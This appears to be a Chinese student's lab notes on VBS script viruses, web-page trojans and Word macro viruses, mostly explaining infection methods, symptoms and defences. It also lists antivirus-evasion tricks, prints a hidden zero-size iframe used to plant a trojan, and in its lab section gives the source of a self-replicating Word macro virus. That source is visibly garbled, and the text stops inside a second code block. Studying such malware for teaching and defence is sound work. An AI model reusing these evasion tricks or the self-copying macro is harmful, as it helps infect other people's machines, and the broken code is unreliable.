<p><strong>5.VBS脚本病毒如何获得控制权</strong><br>　　如何获取控制权？这一个是一个比较有趣的话题，而VBS脚本病毒似乎将这个话题发挥的淋漓尽致。笔者在这里列出几种典型的方法：<br>　　a）修改注册表项<br>　　windows在启动的时候，会自动加载HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run项下的各键值所执向的程序。脚本病毒可以在此项下加入一个键值指向病毒程序，这样就可以保证每次机器启动的时候拿到控制权。vbs修改注册表的方法比较简单，直接调用下面语句即可。 wsh.RegWrite(strName, anyvalue [,strType])<br>　　b）通过映射文件执行方式<br>　　譬如，我们新欢乐时光将dll的执行方式修改为wscript.exe。甚至可以将exe文件的映射指向病毒代码。<br>　　c）欺骗用户，让用户自己执行<br>　　这种方式其实和用户的心理有关。譬如，病毒在发送附件时，采用双后缀的文件名，由于默认情况下，后缀并不显示，举个例子，文件名为beauty.jpg.vbs的vbs程序显示为beauty.jpg，这时用户往往会把它当成一张图片去点击。同样，对于用户自己磁盘中的文件，病毒在感染它们的时候，将原有文件的文件名作为前缀，vbs作为后缀产生一个病毒文件，并删除原来文件，这样，用户就有可能将这个vbs文件看作自己原来的文件运行。<br>　　d）desktop.ini和folder.htt互相配合<br>　　这两个文件可以用来配置活动桌面，也可以用来自定义文件夹。如果用户的目录中含有这两个文件，当用户进入该目录时，就会触发folder.htt中的病毒代码。这是新欢乐时光病毒采用的一种比较有效的获取控制权的方法。并且利用folder.htt，还可能触发exe文件，这也可能成为病毒得到控制权的一种有效方法！</p>
<p><strong>6.VBS脚本病毒对抗反病毒软件的几种技巧</strong><br>　　病毒要生存，对抗反病毒软件的能力也是必需的。一般来说，VBS脚本病毒采用如下几种对抗反病毒软件的方法：<br>　　a）自加密<br>　　譬如，新欢乐时光病毒，它可以随机选取密钥对自己的部分代码进行加密变换，使得每次感染的病毒代码都不一样，达到了多态的效果。这给传统的特征值查毒法带来了一些困难。病毒也还可以进一步的采用变形技术，使得每次感染后的加密病毒的解密后的代码都不一样。<br>　　b）巧妙运用Execute函数<br>　　用过VBS程序的朋友是否会觉得奇怪：当一个正常程序中用到了FileSystemObject对象的时候，有些反病毒软件会在对这个程序进行扫描的时候报告说此Vbs文件的风险为高，但是有些VBS脚本病毒同样采用了FileSystemObject对象，为什么却又没有任何警告呢？原因很简单，就是因为这些病毒巧妙的运用了Execute方法。有些杀毒软件检测VBS病毒时，会检查程序中是否声明使用了FileSystemObject对象，如果采用了，这会发出报警。如果病毒将这段声明代码转化为字符串，然后通过Execute(String)函数执行，就可以躲避某些反病毒软件。<br>　　c）改变某些对象的声明方法<br>　　譬如fso=createobject(“scripting.filesystemobject”)，我们将其改变为fso=createobject(“script”+”ing.filesyste”+”mobject”)，这样反病毒软件对其进行静态扫描时就不会发现filesystemobject对象。<br>　　d）直接关闭反病毒软件<br>　　VBS脚本功能强大，它可以直接在搜索用户进程然后对进程名进行比较，如果发现是反病毒软件的进程就直接关闭，并对它的某些关键程序进行删除。</p>
<p><strong>7.如何防范VBS脚本病毒</strong><br>　　vbs脚本病毒由于其编写语言为脚本，因而它不会像PE文件那样方便灵活，它的运行是需要条件的（不过这种条件默认情况下就具备了）。VBS脚本病毒具有如下弱点：<br>　　a）绝大部分VBS脚本病毒运行的时候需要用到一个对象：FileSystemObject<br>　　b）VBScript代码是通过Windows Script Host来解释执行的。<br>　　c）VBS脚本病毒的运行需要其关联程序Wscript.exe的支持。<br>　　d）通过网页传播的病毒需要ActiveX的支持<br>　　e）通过Email传播的病毒需要OE的自动发送邮件功能支持，但是绝大部分病毒都是以Email为主要传播方式的。<br>　　集中防范措施：<br>　　a）禁用文件系统对象FileSystemObject<br>　　方法：用regsvr32 scrrun.dll /u这条命令就可以禁止文件系统对象。其中regsvr32是Windows\System下的可执行文件。或者直接查找scrrun.dll文件删除或者改名。<br>　　还有一种方法就是在注册表中HKEY_CLASSES_ROOT\CLSID\下找到一个主键的项，咔嚓即可。<br>　　b）卸载Windows Scripting Host<br>　　在Windows 98中（NT 4.0以上同理），打开[控制面板]→[添加/删除程序]→[Windows安装程序]→[附件]，取消“Windows Scripting Host”一项。<br>　　和上面的方法一样，在注册表中HKEY_CLASSES_ROOT\CLSID\下找到一个主键的项，咔嚓。<br>　　c）删除VBS、VBE、JS、JSE文件后缀名与应用程序的映射<br>　　点击[我的电脑]→[查看]→[文件夹选项]→[文件类型]，然后删除VBS、VBE、JS、JSE文件后缀名与应用程序的映射。<br>　　d）在Windows目录中，找到WScript.exe，更改名称或者删除，如果你觉得以后有机会用到的话，最好更改名称好了，当然以后也可以重新装上。<br>　　e）要彻底防治VBS网络蠕虫病毒，还需设置一下你的浏览器。我们首先打开浏览器，单击菜单栏里“Internet 选项”安全选项卡里的[自定义级别]按钮。把“ActiveX控件及插件”的一切设为禁用，这样就不怕了。呵呵，譬如新欢乐时光的那个ActiveX组件如果不能运行，网络传播这项功能就玩完了。<br>　　f）禁止OE的自动收发邮件功能<br>　　g）由于蠕虫病毒大多利用文件扩展名作文章，所以要防范它就不要隐藏系统中已知文件类型的扩展名。Windows默认的是“隐藏已知文件类型的扩展名称”，将其修改为显示所有文件类型的扩展名称。<br>　　h）将系统的网络连接的安全级别设置至少为“中等”，它可以在一定程度上预防某些有害的Java程序或者某些ActiveX组件对计算机的侵害。<br>　　i）呵呵，最后一项不说大家也应该知道了，杀毒软件确实很必要，尽管有些杀毒软件挺让广大用户失望，不过，选择是双方的哦。在这个病毒横飞的网络，如果您的机器没有装上杀毒软件我觉得确实挺不可思议的。</p>
<p><strong>8.VBS病毒特点状况</strong><br>　　VBS病毒是用VB Script编写而成，该脚本语言功能非常强大，它们利用Windows系统的开放性特点，通过调用一些现成的Windows对象、组件，可以直接对文件系统、注册表等进行控制，功能非常强大。应该说病毒就是一种思想，但是这种思想在用VBS实现时变得极其容易。VBS脚本病毒具有如下几个特点：<br>　　a）．编写简单（代表：宏病毒和新欢乐时光病毒），一个以前对病毒一无所知的病毒爱好者可以在很短的时间里编出一个新型病毒来。<br>　　b）．破坏力大。其破坏力不仅表现在对用户系统文件及性能的破坏。他还可以使邮件服务器崩溃，网络发生严重阻塞。<br>　　c）．感染力强。由于脚本是直接解释执行，并且它不需要像PE病毒那样，需要做复杂的PE文件格式处理，因此这类病毒可以直接通过自我复制的方式感染其他同类文件，并且自我的异常处理变得非常容易。<br>　　d）．传播范围大。这类病毒通过htm文档，Email附件或其它方式，可以在很短时间内传遍世界各地。<br>　　e）．病毒源码容易被获取，变种多。由于VBS病毒解释执行，其源代码可读性非常强，即使病毒源码经过加密处理后，其源代码的获取还是比较简单。因此，这类病毒变种比较多，稍微改变一下病毒的结构，或者修改一下特征值，很多杀毒软件可能就无能为力。<br>　　f）．欺骗性强。脚本病毒为了得到运行机会，往往会采用各种让用户不大注意的手段，譬如，邮件的附件名采用双后缀，如.jpg.vbs，由于系统默认不显示后缀，这样，用户看到这个文件的时候，就会认为它是一个jpg格式图片文件。<br>　　g）．使得病毒生产机实现起来非常容易。所谓病毒生产机，就是可以按照用户的意愿，生产病毒的机器（当然，这里指的是程序），目前的病毒生产机，之所以大多数都为脚本病毒生产机，其中最重要的一点还是因为脚本是解释执行的，实现起来非常容易，具体将在我们后面谈及。</p>
<hr>
<h2 id="MPEG2网马"><a href="#MPEG2网马" class="headerlink" title="MPEG2网马"></a>MPEG2网马</h2><p><strong>1.网马的定义</strong><br>　　网马即网页木马，就是指在网页中植入的木马程序，用户在浏览恶意的网页时即运行了木马程序，使用户在不知不觉中中毒。 网页木马往往以脚本形式嵌在HTML网页中，与其它网页不同的是该网页是黑客精心制作的，由于浏览器对用户的保护不会允许可执行程序直接通过浏览器执行，所以网马脚本则恰如其分地利用了软件程序的漏洞，比如浏览器的漏洞，插件的漏洞等，一旦网马执行成功就会获得执行控制权，比如在后台悄悄的自动下载黑客放置在网络上的木马并运行（安装）木马。由于用户中毒的过程比较隐蔽，一般用户较难察觉，所以网马往往很难防范，并且传播病毒的能力非常强，尤其在当一个通用的IE 0day漏洞被发现时，更是可怕。</p>
<p><strong>2.网马的概述</strong><br>　　很多朋友都碰到过这样的现象：打开一个网站，结果页面还没显示，杀毒软件就开始报警，提示检测到木马病毒。有经验的朋友会知道这是网页恶意代码，但是自己打开的明明是正规网站，没有哪家正规网站会将病毒放在自己的网页上吧？那么是什么导致了这种现象的发生呢？其中最有可能的一个原因就是：这个网站被挂马了。</p>
<p><strong>3.挂马的核心：木马</strong><br>　　从“挂马”这个词中我们就可以知道，这和木马脱离不了关系。的确，挂马的目的就是将木马传播出去，挂马只是一种手段。挂马使用的木马大致可以分为两类：一类是以远程控制为目的的木马，黑客使用这种木马进行挂马攻击，其目的是为了得到大量的肉鸡，以此对某些网站实施拒绝服务攻击或达到其他目的（目前绝大多数实施拒绝服务攻击的傀儡计算机都是挂马攻击的受害者）。另一类是键盘记录木马，我们通常称其为盗号木马，其目的不言而喻，都是冲着我们的游戏帐号或者银行帐号来的。目前挂马所使用的木马多数属于后者。</p>
<p><strong>4.潜伏的攻击者：网页木马</strong><br>　　为什么我们一打开网页就会运行木马程序，木马又是如何“挂”在网站上的呢？这就要涉及“网页木马”这个概念。网页木马就是将木马和网页结合在一起，打开网页的同时也会运行木马。最初的网页木马原理是利用IE浏览器的ActiveX控件，运行网页木马后会弹出一个控件下载提示，只有点击确认后才会运行其中的木马。这种网页木马在当时网络安全意识普遍不高的情况下还是有一点使用价值的，但是其缺点是显而易见的，就是会出现ActiveX控件下载提示。当然现在很少会有人去点击那莫名其妙的ActiveX控件下载确认窗口。<br>　　在这种情况下，新的网页木马诞生了。这类网页木马通常利用了IE浏览器的漏洞，在运行的时候没有丝毫提示，因此隐蔽性极高。可以说，正是IE浏览器层出不穷的漏洞造成了如今网页木马横行的网络。<br>　　通常被挂马的目标网站是会插入一段代码。比如：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;iframe src=&quot;/muma.htm&quot;; width=&quot;0&quot; height=&quot;0&quot; frameborder=&quot;0&quot;&gt;&lt;/iframe&gt;</span><br></pre></td></tr></table></figure>

<p>　　src参数后面的是网页木马的地址。当我们打开这个网站的首页后，会弹出网页木马的页面，这个页面我们是无法看到的，因为我们在代码中设置了弹出页面的窗口长宽各为0。此时木马也已经悄悄下载到本机并运行了。网马危害非常大，攻击用户也是在极短时间内，作为信息安全的学生，我们必须要掌握分析网马的方法。</p>
<p><strong>5.病毒预防</strong><br>　　a）．给系统安装补丁程序。通过Windows Update安装好系统补丁程序(关键更新、安全更新和Service pack)，其中MS04-011、MS04-012、MS04-013、MS03-001、MS03-007、MS03-049、MS04-032等都被病毒广泛利用，是非常必要的补丁程序<br>　　b）．给系统管理员帐户设置足够复杂足够强壮的密码，最好能是10位以上，字母+数字+其它符号的组合；也可以禁用/删除一些不使用的帐户。<br>　　c）．经常更新杀毒软件（病毒库），设置允许的可设置为每天定时自动更新。安装并合理使用网络防火墙软件，网络防火墙在防病毒过程中也可以起到至关重要的作用，能有效地阻挡自来网络的攻击和病毒的入侵。部分盗版Windows用户不能正常安装补丁，这点也比较无奈，这部分用户不妨通过使用网络防火墙来进行一定防护。<br>　　d）．关闭一些不需要的服务，条件允许的可关闭没有必要的共享，也包括C$、D$等管理共享。完全单机的用户可直接关闭Server服务。</p>
<hr>
<h2 id="WORD宏病毒"><a href="#WORD宏病毒" class="headerlink" title="WORD宏病毒"></a>WORD宏病毒</h2><p><strong>1.宏病毒定义</strong><br>　　宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档，其中的宏就会被执行，于是宏病毒就会被激活，转移到计算机上，并驻留在Normal模板上。从此以后，所有自动保存的文档都会“感染”上这种宏病毒，而且如果其他用户打开了感染病毒的文档，宏病毒又会转移到他的计算机上。</p>
<p><strong>2.宏病毒判断方法</strong><br>　　虽然不是所有包含宏的文档都包含了宏病毒，但当有下列情况之一时，您可以百分之百地断定您的OFFICE文档或OFFICE系统中有宏病毒：<br>　　a)、在打开“宏病毒防护功能”的情况下，当您打开一个您自己写的文档时，系统会弹出相应的警告框。而您清楚您并没有在其中使用宏或并不知道宏到底怎么用，那么您可以完全肯定您的文档已经感染了宏病毒。<br>　　b)、同样是在打开“宏病毒防护功能”的情况下，您的OFFICE文档中一系列的文件都在打开时给出宏警告。由于在一般情况下我们很少使用到宏，所以当您看到成串的文档有宏警告时，可以肯定这些文档中有宏病毒。<br>　　c)、如果软件中关于宏病毒防护选项启用后，不能在下次开机时依然保存。WORD97中提供了对宏病毒的防护功能，它可以在“工具/选项/常规”中进行设定。但有些宏病毒为了对付OFFICE97中提供的宏警告功能，它在感染系统（这通常只有在您关闭了宏病毒防护选项或者出现宏警告后您不留神选取了“启用宏”才有可能）后，会在您每次退出 OFFICE时自动屏蔽掉宏病毒防护选项。因此您一旦发现:您的机器中设置的宏病毒防护功能选项无法在两次启动WORD之间保持有效，则您的系统一定已经感染了宏病毒。也就是说一系列WORD模板、特别是normal.dot 已经被感染。<br>　　鉴于绝大多数人都不需要或者不会使用“宏”这个功能，我们可以得出一个相当重要的结论：如果您的OFFICE文档在打开时，系统给出一个宏病毒警告框，那么您应该对这个文档保持高度警惕，它已被感染的几率极大。注意：简单地删除被宏病毒感染的文档并不能清除OFFICE系统中的宏病毒！</p>
<p><strong>3.宏病毒防治清除</strong><br>　　a)、首选方法：用最新版的反病毒软件清除宏病毒。使用反病毒软件是一种高效、安全和方便的清除方法，也是一般计算机用户的首选方法。但是宏病毒并不象某些厂商或麻痹大意的人那样认为的有所谓“广谱”的查杀软件，这方面的突出例子就是ETHAN宏病毒。<br>　　ETHAN宏病毒相当隐蔽，比如您使用KV300 Z+、RAV V9.0(11)、 KILL 85.03等反病毒软件（应该算比较新的版本了）都无法查出它。此外这个宏病毒能够悄悄取消WORD中宏病毒防护选项，并且某些情况下会把被感染的文档置为只读属性，从而更好地保存了自己。因此，对付宏病毒应该和对付其它种类的病毒一样，也要尽量使用最新版的查杀病毒软件。无论你使用的是何种反病毒软件，及时升级是非常重要的。比如虽然KV300 Z+版不能查杀ETHAN宏病毒，但最新推出的KV300 Z++已经可以查杀它。<br>　　b)、应急处理方法：用写字板或WORD 6.0文档作为清除宏病毒的桥梁。如果您的WORD系统没有感染宏病毒，但需要打开某个外来的、已查出感染有宏病毒的文档，而手头现有的反病毒软件又无法查杀它们，那么您可以试验用下面的方法来查杀文档中的宏病毒：打开这个包含了宏病毒的文档（当然是启用WORD中的“宏病毒防护”功能并在宏警告出现时选择“取消宏”），然后在“文件”菜单中选择“另存为”，将此文档改存成写字板（RTF）格式或WORD6.0格式。<br>　　在上述方法中，存成写字板格式是利用RTF文档格式没有宏，存成 WORD 6.0格式则是利用了WORD97文档在转换成WORD6.0格式时会失去宏的特点。写字板所用的rtf格式适用于文档中的内容限于文字和图片的情况下，如果文档内容中除了文字、图片外还有图形或表格，那么按 WORD6.0格式保存一般不会失去这些内容。<br>　　存盘后应该检查一下文档的完整性，如果文档内容没有任何丢失，并且在重新打开此文档时不再出现宏警告则大功告成。</p>
<p><strong>4.宏病毒的危害</strong><br>　　主要在以下方面：<br>　　a)、宏病毒的主要破坏<br>　　WORD宏病毒的破坏在两方面：<br>　　①．对WORD运行的破坏是：不能正常打印；封闭或改变文件存储路径；将文件改名；乱复制文件；封闭有关菜单；文件无法正常编辑。如Taiwan No.l Macro病毒每月13日发作，所有编写工作无法进行。<br>　　②．对系统的破坏是：Word Basic语言能够调用系统命令，造成破坏。<br>　　b)、宏病毒隐蔽性强，传播迅速，危害严重，难以防治<br>　　与感染普通.EXE或.COM文件的病毒相比，Word宏病毒具有隐蔽性强，传播迅速，危害严重，难以防治等特点。<br>　　①．宏病毒隐蔽性强<br>　　由于人们忽视了在传递一个文档时也会有传播病毒的机会。<br>　　②．宏病毒传播迅速<br>　　因为办公数据的交流要比拷贝.EXE文件更加经常和频繁，如果说扼制盗版可以减少普通.EXE或.COM病毒传播的话，那么这一招对Word病毒将束手无策。<br>　　③．危害严重<br>　　因为Microsoft Word几乎已经成为全世界办公文档的事实工业标准，其影响是全球范围的，在中国也绝不例外。Word文件的交换是目前办公数据交流和传送的最通常的方式之一，其涉及面比盗版软件的传播要大得多，传播速度则更加有过之而无不及。据报道，70%-80%的中国计算机用户已经不再单纯使用MSDOS作为唯一的操作环境，看VCD和使用Word成为用户使用Windows应用程序的榜首。无数的DOC文件从上级机关金字塔般地传播到基层， 基层又上报到上级机关，从各个单位的办公室到工作者的家庭，到出版部门的计算机系统。于是，便存在这样一种可能，当成千上万的x86计算机系统在传播和复制这些数据以及文档文件的同时，也在忠实地传播和复制这些病毒。<br>　　由于该病毒能跨越多种平台，并且针对数据文档进行破坏，因此具有极大的危害性，该病毒在公司通过内联网相互进行文档传送时，迅速蔓延，往往很快就能使公司的机器全部染上病毒。<br>　　④．难以防治<br>　　由于宏病毒利用了Word的文档机制进行传播，所以它和以往的病毒防治方法不同。一般情况下，人们大多注意可执行文件（.COM、.EXE）的病毒感染情况，而Word宏病毒寄生于Word的文档中，而且人们一般都要对文档文件进行备份，因此病毒可以隐藏很长一段时间。</p>
<p><strong>5.宏病毒的特点</strong><br>　　宏病毒是针对微软公司的文字处理软件Word编写的一种病毒。微软公司的文字处理软件是最为流行的编辑软件，并且跨越了多种系统平台，宏病毒充分利用了这一点得到恣意传播。宏病毒作为一种新型病毒有其特性与共性。<br>　　a） 宏病毒特性<br>　　①传播极快<br>　　Word宏病毒通过.DOC文档及.DOT模板进行自我复制及传播，而计算机文档是交流最广的文件类型。人们大多重视保护自己计算机的引导部分和可执行文件不被病毒感染，而对外来的文档文件基本是直接浏览使用，这给Word宏病毒传播带来很多便利。特别是Internet网络的普及，Email的大量应用更为Word宏病毒传播铺平道路。根据国外较保守的统计，宏病毒的感染率高达40%以上，即在现实生活中每发现100个病毒，其中就有40多个宏病毒，而国际上普通病毒种类已达12000多种。<br>　　②制作、变种方便<br>　　以往病毒是以二进制的计算机机器码形式出现，而宏病毒则是以人们容易阅读的源代码宏语言WordBasic形式出现，所以编写和修改宏病毒比以往病毒更容易。世界上的宏病毒原型己有几十种，其变种与日俱增，追究其原因还是Word的开放性所致。Word病毒都是用WordBasic语言所写成，大部分Word病毒宏并没有使用Word提供的Execute-Only处理函数处理，它们仍处于可打开阅读修改状态。所有用户在Word工具的宏菜单中很方便就可以看到这种宏病毒的全部面目。当然会有“不法之徒”利用掌握的Basic语句简单知识把其中病毒激活条件和破坏条件加以改变，立即就生产出了一种新的宏病毒，甚至比原病毒的危害更加严重。<br>　　③破坏可能性极大<br>　　鉴于宏病毒用WordBasic语言编写，WordBasic语言提供了许多系统级底层调用，如直接使用DOS系统命令，调用WindowsAPI，调用DDE或DLL等。这些操作均可能对系统直接构成威胁，而Word在指令安全性、完整性上检测能力很弱，破坏系统的指令很容易被执行。宏病毒Nuclear就是破坏操作系统的典型一例。<br>　　④多平台交叉感染<br>　　宏病毒冲破了以往病毒在单一平台上传播的局限，当WORD、EXCEL这类著名应用软件在不同平台（如Windows、Windo_wsNT、OS/2和MACINTOSH等）上运行时，会被宏病毒交叉感染。<br>　　b） 宏病毒共性<br>　　宏病毒具有一些共性：<br>　　①以往病毒只感染程序，不感染数据文件，而宏病毒专门感染数据文件，彻底改变了人们的“数据文件不会传播病毒”的错误认识。宏病毒会感染.DOC文档文件和.DOT模板文件。被它感染的.DOC文档属性必然会被改为模板而不是文档，但不一定修改文件的扩展名。而用户在另存文档时，就无法将该文档转换为任何其他方式，而只能用模板方式存盘。这一点在多种文本编辑器需转换文档时是绝对不允许的。<br>　　②染毒文档无法使用“另存为（SaveAs）”修改路径以保存到另外的磁盘/子目录中。<br>　　③病毒宏的传染通常是Word在打开一个带宏病毒的文档或模板时，激活了病毒宏，病毒宏将自身复制至Word的通用（Normal）模板中，以后在打开或关闭文件时病毒宏就会把病毒复制到该文件中。<br>　　④大多数宏病毒中含有AutoOpen，AutoClose，AutoNew和AutoExit等自动宏。只有这样，宏病毒才能获得文档（模板）操作控制权。有些宏病毒还通过FileNew，FileOpen，FileSave，FileSaveAs，FileExit等宏控制文件的操作。<br>　　⑤病毒宏中必然含有对文档读写操作的宏指令。<br>　　⑥宏病毒在.DOC文档、.DOT模板中是以BFF（BinaryFileFormat）格式存放，这是一种加密压缩格式，每种Word版本格式可能不兼容。</p>
<p><strong>6.宏病毒的预防</strong><br>　　Microsoft公司的Word字处理软件因其功能强大，使用方便等诸多优点受到广大使用者的青睐，版本从2．0、5．0、6．0直7．0（Word95）、8．0（Word97），不断升级。Word的推广使用，确实为文本处理工作带来了极大的便利，但随之而来的宏病毒也平添了不少烦脑。宏病毒困扰着用Word处理的文本，轻则文本不能正常存储，重则变成乱码，甚至磁盘被格式化，使许多普通用户谈“宏”变色。实际上，在了解了Word宏病毒的编制、发作过程之后，即使是普通的电脑用户，不借助任何杀毒软件，也可以较好地对其进行防治。<br>　　Word宏病毒是一种用专门的Basic语言即WordBasic编写的程序。与其它计算机病毒一样，它能对用户系统中的可执行文件和数据、文本类文件造成破坏。Word中提供由用户编制宏这一功能是为了让用户能够用简单的程序，简化一些经常重复性的操作，与DOS中的批处理文件类似。Word宏的编制技术，与其它复杂的编程技术相比，要求很低很容易编制，这就为心怀恶意的计算机用户提供了一种简单高效的制造病毒手段。但也正因其编制简单，使宏病毒的防治远较那些用复杂的编程语言编制的病毒容易得多。<br>　　下面就谈在日常用Word处理文本时，如何预防和消除宏病毒。防止“病从口入”是对付所有病毒的指导思想，同样对付宏病毒的重点也应该放在对其预防上。Word宏病毒的触发条件是在启动或调用Word文档时，自动触发执行，因此，只要不打开被感染的文本，宏病毒是不会传播的。如果打开了带毒的文本，其它没打开的文本不会被感染；即使是打开了其它文本，只要不存盘，也不会感染到硬盘中的文本。Word本身不带病毒，即初次进入Word环境时没有病毒，一旦在其中打开带宏病毒的文件，病毒就会留在Word环境中，如果这时打开其它文件，这些文件就会被感染；更严重的是，关闭Word时的环境就带上了宏病毒，而这时处理的所有文档都将感染上宏病毒。<br>　　a） 宏病毒入侵<br>　　宏病毒入侵有两条路径，一是E-mail，二是软盘，其共同特点是只能通过word格式（文件后缀为dos或rtf）传播。只要不用word格式存盘，而用txt格式，宏病毒就无从存活了。因此，为了防止宏病毒通过软盘流传，在交换软盘时，可要求对方用TXT格式传交文件，或者先用Window提供的书写器（对window3．X而言），或写字板（对Window而言）打开外来的word文档，将其先转换成书器或写字板格式的文件并不保存后，再用word调用。因为书写器或写字板是不调用也不记录和保存任何Word宏的，文档经此转换，所有附带其上的宏都将丢失，当然，这样做将使该Word文档中所有的排版格式一并丢失。<br>　　b） 宏病毒判断<br>　　如果必须保留原有的文档排版格式，可以有以下几种方式预防或判断是否有宏病毒。<br>　　①、为了防止病毒的侵入，用户在新安装了Word后，可打开一个新模板，将Word的工作环境按你的使用习惯进行设置，并将你需要使用的宏一次编制好，做完后，保存为Normal.dot。新的Normal.dot按你的需要设置并绝对没有宏病毒，将这份干净的Normal.dot备份。在遇到有宏病毒或怀疑感染了宏病毒的时候，用备份的Normal.dot覆盖当前的Normal.dot模块。另外，为了防止病毒蔓延，可将你新设置的Normal.dot文件的属性设置成“只读”，以后当退出Word环境时，如果出现自动修改“Normal.dot”的对话框，而你并没有录制新的宏，说明有宏病毒，此时选择“否”，以保持Word环境的干净。<br>　　②、在调用Word文档时先禁止所有以Auto开头的宏的执行（因为一般宏病毒只能用“Auto×××”命名）。这样能保证用户在安全启动Word文档后，再时行必要的病毒检查。对于使用Word97版本的用户，Word97已经提供此项功能，将其激活或开即可。方法是点击“工具|选项”，然后单击“常规”，选择“宏病毒防护”，使其有效，这样，当前打开的Word文档所使用模板就有了防止“自动宏”（以Auto开头命名）执行的功能。当以后使用这个模板的文档时，如果打开的文档带有“自动宏”，并询问用户是否执行这些宏，这进选择“取消宏”进入Word并打开文档，再进一步对文档进行“宏”检查。对使用Word97以前版本的用户，需要自行编制一个名为AutoExec的。将AutoExec宏保存在一个另外命名的Word模板中，比如AE.dot，当要使用外来的Word文档时，将AE.dot模板该名为Normal.dot（备份原来的Normal.dot），宏AutoExec执行时，将关闭其它所有动执行的Word宏。如果不使用外来文档，可以将原来备份的Normal.dot模板再该名拷贝回来。<br>　　c） 宏病毒清除步骤<br>　　如果确信你的文件和系统已不幸感染了宏病毒。毫无疑问，应该停下手边的其它工作，争取彻底清除宏病毒。一般可采取以下两个步骤：<br>　　①、进入“工具|宏”，查看模板Normal.dot，若发现有Filesave、Filesaveas等文件操作宏或类似AAAZAO、AAAZFS怪名字的宏，说明系统确实感染了宏病毒，删除这些来历不明的宏。对以Auto×××命名的，若不是用户自己命名的自动宏，则说明文明感染了宏病毒，删除它们。若是用户自己创建的自动宏，可以打开它，看是否与原来创建时的内容一样，如果存在被改变处，说明你编制的自动宏已经宏病毒修改这时应该将自动宏修改为原来编制的内容。在最糟的情况下，如果分不清那些是宏病毒，为安全起见，可删除所有来路不明的宏，甚至是用户自己创建的宏。因为即便删错了，也不会对Word文档内容产生任何影响，仅仅是少了“宏功能”。如果需要，还可以重新编制。<br>　　②、即使在“工具|宏”删除了所有的病毒宏，并不意味着你可以高枕无忧了。因为病毒原体还在文本中，只不过暂时不活动了，也许还会死灰复燃。为了彻底消除宏病毒，再时入“文件|新建”，选择“模板”，正常情况下，可以在“文件模板”处见到“Normal.dot”，如果没有，说明文档模板文件Normal.dot已被病毒修改了。这时用你手边原来备份的Normal.dot覆盖当前的Normal.dot；或你没有备份，则删掉然毒Normal.dot，重新进入Word，在“模板”里，重置默认字体等选项后退出Word，系统就会自动创建一个干净的Normal.dot。再进入Word，再打开原来的文本，并新建另一个空文档，这时新建文档是干净的；将原文件的全部内容拷贝到新文件中，关闭感染宏病毒的文本，然后再将新文本保存为原文件名存储。这样，宏病毒就感染彻底清除了，原文件也恢复了原样，可以放心大胆地编辑、修改、存储了。<br>虽然上述方法对大部分宏病毒可彻底清除，但是“道高一尺，魔高一丈”，有些智能点数比较高的宏病毒，会事先防范，让宏编辑功能失效，进入“工具|宏”的时候，看不到病毒的名字，因此，也就无法删除它们。对付这“狡猾”的宏病毒，可选用杀宏病毒的专门软件如KV300、VAV、瑞星等进行杀除。并注意检查出文件可能感染病毒后，首先对文件备份，然后再执行清除命令，以免意情况下杀掉病毒的同时改变原文件的内容。<br>　　以上是关于宏病毒的预防和杀除。总之，首先要保证文档环境无病毒，即Normal.dot文档模板是干净的；其次是要预防在Word里打开的文本携有病毒；最后，发现了宏病毒后，要采取行之有效的措施，保证文档环境、文档本身恢复到无病毒状态。</p>
<p><strong>实验内容</strong></p>
<ol>
<li><p>在桌面新建一个word文档，输入信息。</p>
</li>
<li><p>在文件-选项-信任中心-信任中心设置-宏设置，选择“启用所有宏”，并勾选信任选项。</p>
</li>
<li><p>在“Word选项”卡下，点击“自定义功能区”，勾选“开发工具”，然后点击“确定”。</p>
</li>
<li><p>点击菜单栏中刚才添加的“开发工具”，然后点击“Visual Basic”，进入VB编辑器。</p>
</li>
<li><p>编写宏病毒</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">#简单的弹出一个提示框。</span><br><span class="line">&#x27;Micro-Virus</span><br><span class="line">Sub Document_ Open()</span><br><span class="line">On Error Resume Next</span><br><span class="line">Application. DisplayStatusBar = False</span><br><span class="line">Options. SaveNormalPrompt = False</span><br><span class="line">Ourcode = ThisDocument. VBProject. VBComponents(1). CodeModule. Lines(1,100)</span><br><span class="line">Set Host = NormalTemplate.VBProject.VBComponents (1). CodeModule</span><br><span class="line">If ThisDocument = NormalTemplate Then</span><br><span class="line">	Set Host = ActiveDocument. VBProject. VBComponents (1). CodeModule</span><br><span class="line">End If</span><br><span class="line">With Host</span><br><span class="line">	If .Lines(1.1) &lt;&gt; &quot;Micro-Virus&quot; Then</span><br><span class="line">		.DeleteLines 1.. CountOfLines</span><br><span class="line">		.InsertLines 1，Ourcode</span><br><span class="line">				.ReplaceLine 2, &quot;Sub Document_Close()&quot;</span><br><span class="line">				If ThisDocument = nomal template Then</span><br><span class="line">						.ReplaceLine 2, &quot;Sub Document _Open()&quot;|</span><br><span class="line">			ActiveDocument.SaveAs ActiveDocumnent. FullName</span><br><span class="line">		End If</span><br><span class="line">	End If .</span><br><span class="line">End Wi th</span><br><span class="line">MsgBox &quot;MicroVirus by Content Security Lab&quot;</span><br><span class="line">End Sub</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span 